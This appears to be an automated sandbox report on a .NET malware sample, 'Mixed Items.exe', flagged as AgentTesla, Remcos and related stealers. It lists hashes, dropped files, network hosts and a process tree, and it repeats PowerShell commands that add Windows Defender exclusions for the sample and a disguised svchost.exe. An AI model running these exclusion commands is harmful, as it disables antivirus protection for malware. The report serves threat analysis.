                                                                                                    SHA1:9E62843D1F6A90DD6C9D5B7156F2E236AA6FC832
                                                                                                    SHA-256:2ADC8A9B9CCF3E327E228C7C2105F44FA93C0C25122BCCA07B26DE634E53DC1C
                                                                                                    SHA-512:B41D518369BCB24E2553B2728CF8B7BA56FE454F3913C6039C4632CDF9F06ABCA4F079F6F8EA7E5B7EAEC484EDD26D25F1AF4D46A5701D1F1B9D11C38A15CB36
                                                                                                    Malicious:false
                                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210305142831..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 506013 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe -Force..Process ID: 4116..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210305142831..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe -Force..
                                                                                                    C:\Users\user\Documents\20210305\PowerShell_transcript.506013.YRcDMrIT.20210305142756.txt
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):846
                                                                                                    Entropy (8bit):5.3022844597421495
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:BxSAAxvBnbx2DOXUWeSuqpW5HjeTKKjX4CIym1ZJXCuqh:BZEvhboO+Sp45qDYB1Zcph
                                                                                                    MD5:BD2110BFCB03716BF8B4DD1A9B4FA1EC
                                                                                                    SHA1:C8752AAC9BE7358714B07FAE68972054E6B0C9C4
                                                                                                    SHA-256:714D9629E7B36AA452AE2B4DB202431320629E0BB1702116DB739D219BA91155
                                                                                                    SHA-512:1F50DA1C70F1465FD1A5BA4BE7663C55FD5B7D10C18CBB7F1721D72C93B2C5CDD5897B76067EE1867D580E3FF186DC72D087D1E3CD24F1C0BFFE9D1457353A28
                                                                                                    Malicious:false
                                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210305142831..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 506013 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Mixed Items.exe -Force..Process ID: 6300..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210305142831..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Mixed Items.exe -Force..
                                                                                                    C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe
                                                                                                    Process:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):86808
                                                                                                    Entropy (8bit):5.248273656007456
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:FjWGjHoODdPfUwUmsA4de1IeT0EtRwwwqe+Sk5XTsLhD:bjN5UwDsteT0wsJ
                                                                                                    MD5:017E52146C9131DBC9487D834CDFC247
                                                                                                    SHA1:6DFF831A7FD2A42EC3ABE4C1BA51F3A9C9C6A25B
                                                                                                    SHA-256:26C230CDE9FB7544F7E3762F1ABAC39F6C8F0D2DB0689178B223E0E68D2A6A0A
                                                                                                    SHA-512:0BB939ADF020A01DB26B057ADEAD21EC5A6A6FA3A081B6466BA6FC5B661D1EBEA507E17A14588FDDFEB85536674382A8CD77057F569E0EB9278C9C403D97177D
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 21%
                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r.y..........."...0..2...........Q... ...`....@.. ..............................W.....@.................................dQ..W....`...............>............................................................... ............... ..H............text....1... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............<..............@..B.................Q......H.......<+..(&...........................................................*F.(........(.....*".(.....*>..r}..p.o4....*".(5....*Vs....(6...t.........*F.(........(.....*.rL..pzrL..pzrL..pzrL..pzrL..pzrL..pzrL..pzrL..pz*.rL..pzrL..pzrL..pzrL..pzrL..pzrL..pz*.rL..pzrL..pzrL..pzrL..pzrL..pzrL..pzrL..pzrL..pzrL..pz*.rL..pzrL..pzrL..pzrL..pzrL..pzrL..pzrL..pz*.rL..pzrL..pzrL..pzrL..pzrL..pzrL..pzrL..pzrL..pzrL..pzrL..pz*~rL..pzrL..pzrL..pzrL..pzrL..pz*.0..........rL..pzrL..pzrL..pzrL
                                                                                                    C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe:Zone.Identifier
                                                                                                    Process:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26
                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                    Malicious:true
                                                                                                    Preview: [ZoneTransfer]....ZoneId=0
                                                                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):55
                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                    Malicious:false
                                                                                                    Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Entropy (8bit):5.248273656007456
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                                    File name:Mixed Items.exe
                                                                                                    File size:86808
                                                                                                    MD5:017e52146c9131dbc9487d834cdfc247
                                                                                                    SHA1:6dff831a7fd2a42ec3abe4c1ba51f3a9c9c6a25b
                                                                                                    SHA256:26c230cde9fb7544f7e3762f1abac39f6c8f0d2db0689178b223e0e68d2a6a0a
                                                                                                    SHA512:0bb939adf020a01db26b057adead21ec5a6a6fa3a081b6466ba6fc5b661d1ebea507e17a14588fddfeb85536674382a8cd77057f569e0eb9278c9c403d97177d
                                                                                                    SSDEEP:768:FjWGjHoODdPfUwUmsA4de1IeT0EtRwwwqe+Sk5XTsLhD:bjN5UwDsteT0wsJ
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r.y..........."...0..2...........Q... ...`....@.. ..............................W.....@................................

                                                                                                    File Icon

                                                                                                    Icon Hash:00828e8e8686b000

                                                                                                    Static PE Info

                                                                                                    General

                                                                                                    Entrypoint:0x4151be
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:true
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                    Time Stamp:0xEA799C72 [Sat Aug 28 12:54:10 2094 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:v4.0.30319
                                                                                                    OS Version Major:4
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:4
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:4
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                    Authenticode Signature

                                                                                                    Signature Valid:false
                                                                                                    Signature Issuer:C=CxIXTKwSoMCLxPuWHhugs, S=lgYPTXZnvpiTkGdjupDgPoRlmhzkTzHbzenLEGqYPHbubwMQ, L=CwjVPVwJkqWwFGdmwR, T=RyzWKLBwDeWQzCUxqptR, E=zXPiPGIuTRAxwAsULVOVRHusYTQNXjGkAaVL, OU=iIVbAskroXcHwzniFtPapLluJGHoDsfundBtrSwFtel, O=muVoRorsGTceSKbnTWYDwAiBFlHcPnOIRP, CN=gvZGrBSrlMevBvcRpsHBJVQfMpkpvyqNEL
                                                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                    Error Number:-2146762487
                                                                                                    Not Before, Not After
                                                                                                    • 3/4/2021 4:46:19 PM 3/4/2022 4:46:19 PM
                                                                                                    Subject Chain
                                                                                                    • C=CxIXTKwSoMCLxPuWHhugs, S=lgYPTXZnvpiTkGdjupDgPoRlmhzkTzHbzenLEGqYPHbubwMQ, L=CwjVPVwJkqWwFGdmwR, T=RyzWKLBwDeWQzCUxqptR, E=zXPiPGIuTRAxwAsULVOVRHusYTQNXjGkAaVL, OU=iIVbAskroXcHwzniFtPapLluJGHoDsfundBtrSwFtel, O=muVoRorsGTceSKbnTWYDwAiBFlHcPnOIRP, CN=gvZGrBSrlMevBvcRpsHBJVQfMpkpvyqNEL
                                                                                                    Version:3
                                                                                                    Thumbprint MD5:9D1E87B33DFAD65CD7994E81536FE81B
                                                                                                    Thumbprint SHA-1:9121B22BFA1E034D66ECBBEF0A16A7F99FF1ED71
                                                                                                    Thumbprint SHA-256:B6ED10F00D23B1B6587357AD36112AE283853F098AB3557F1B7B358F01F105DB
                                                                                                    Serial:00FD586FE6F8FB5F9B46153E047AAE8BBA

                                                                                                    Entrypoint Preview

                                                                                                    Instruction
                                                                                                    jmp dword ptr [00402000h]
                                                                                                    add byte ptr [eax], al

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x15164          0x57          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x16000          0x610         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x13e00          0x1518
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x18000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x2000           0x131c4       0x13200   False     0.223754084967   data       5.04447660027   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x16000          0x610         0x800     False     0.32373046875    data       3.4701340184    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x18000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name         RVA      Size   Type                                                                         Language  Country
RT_VERSION   0x160a0  0x380  data
RT_MANIFEST  0x16420  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL          Import
mscoree.dll  _CorExeMain

Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright 2021
Assembly Version  3.3.0.0
InternalName      MotherFuckerBitch.exe
FileVersion       3.3.0.0
CompanyName       WindowsAPI
LegalTrademarks   WindowsAPI
Comments          WindowsAPI
ProductName       WindowsAPI
ProductVersion    3.3.0.0
FileDescription   WindowsAPI
OriginalFilename  MotherFuckerBitch.exe

                                                                                                    Network Behavior

                                                                                                    Network Port Distribution

                                                                                                    TCP Packets

                                                                                                    Mar 5, 2021 14:27:18.849256039 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.849315882 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.849333048 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.849354982 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.849379063 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.850135088 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.850168943 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.850217104 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.851083994 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.851118088 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.851159096 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.852065086 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.852140903 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.884360075 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.884390116 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.884510994 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.884758949 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.884787083 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.884887934 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.885612965 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.885643959 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.885736942 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.886550903 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.886584044 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.886677027 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.887463093 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.887495995 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.887579918 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.888396978 CET8049706104.21.31.39192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class

HTTP Request Dependency Graph

• liverpoolofcfanclub.com
• checkip.dyndns.org
• whatismyipaddress.com

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 14:27:15
Start date: 05/03/2021
Path: C:\Users\user\Desktop\Mixed Items.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\Mixed Items.exe'
Imagebase: 0x3e0000
File size: 86808 bytes
MD5 hash: 017E52146C9131DBC9487D834CDFC247
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: low

General

Start time: 14:27:29
Start date: 05/03/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff7488e0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:27:40
Start date: 05/03/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase: 0x7ff7488e0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:27:42
Start date: 05/03/2021
Path: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Imagebase: 0x400000
File size: 91000 bytes
MD5 hash: 17FC12902F4769AF3A9271EB4E2DACCE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 3%, Metadefender
• Detection: 0%, ReversingLabs
Reputation: moderate

General

Start time: 14:27:44
Start date: 05/03/2021
Path: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe' /SpecialRun 4101d8 7032
Imagebase: 0x400000
File size: 91000 bytes
MD5 hash: 17FC12902F4769AF3A9271EB4E2DACCE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 14:27:48
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Mixed Items.exe' -Force
                                                                                                    Imagebase:0xe70000
                                                                                                    File size:430592 bytes
                                                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:14:27:49
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Mixed Items.exe' -Force
                                                                                                    Imagebase:0xe70000
                                                                                                    File size:430592 bytes
                                                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:14:27:49
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6b2800000
                                                                                                    File size:625664 bytes
                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:14:27:50
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' -Force
                                                                                                    Imagebase:0xe70000
                                                                                                    File size:430592 bytes
                                                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:14:27:50
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6b2800000
                                                                                                    File size:625664 bytes
                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:14:27:51
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6b2800000
                                                                                                    File size:625664 bytes
                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:14:27:52
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                    Imagebase:0x7ff7488e0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:27:52
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                    Imagebase:0x7ff7488e0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:27:55
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                    Imagebase:0x7ff7488e0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:27:55
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                    Imagebase:0x7ff7488e0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:27:56
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                    Imagebase:0x7ff7488e0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:27:56
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    Imagebase:0x470000
                                                                                                    File size:86808 bytes
                                                                                                    MD5 hash:017E52146C9131DBC9487D834CDFC247
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:27:56
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                    Imagebase:0x7ff7488e0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:27:57
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    Imagebase:0x40000
                                                                                                    File size:86808 bytes
                                                                                                    MD5 hash:017E52146C9131DBC9487D834CDFC247
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:27:58
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    Imagebase:0x9a0000
                                                                                                    File size:86808 bytes
                                                                                                    MD5 hash:017E52146C9131DBC9487D834CDFC247
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:Visual Basic
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000003.321855545.0000000004361000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000003.328468981.00000000043CD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                    • Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
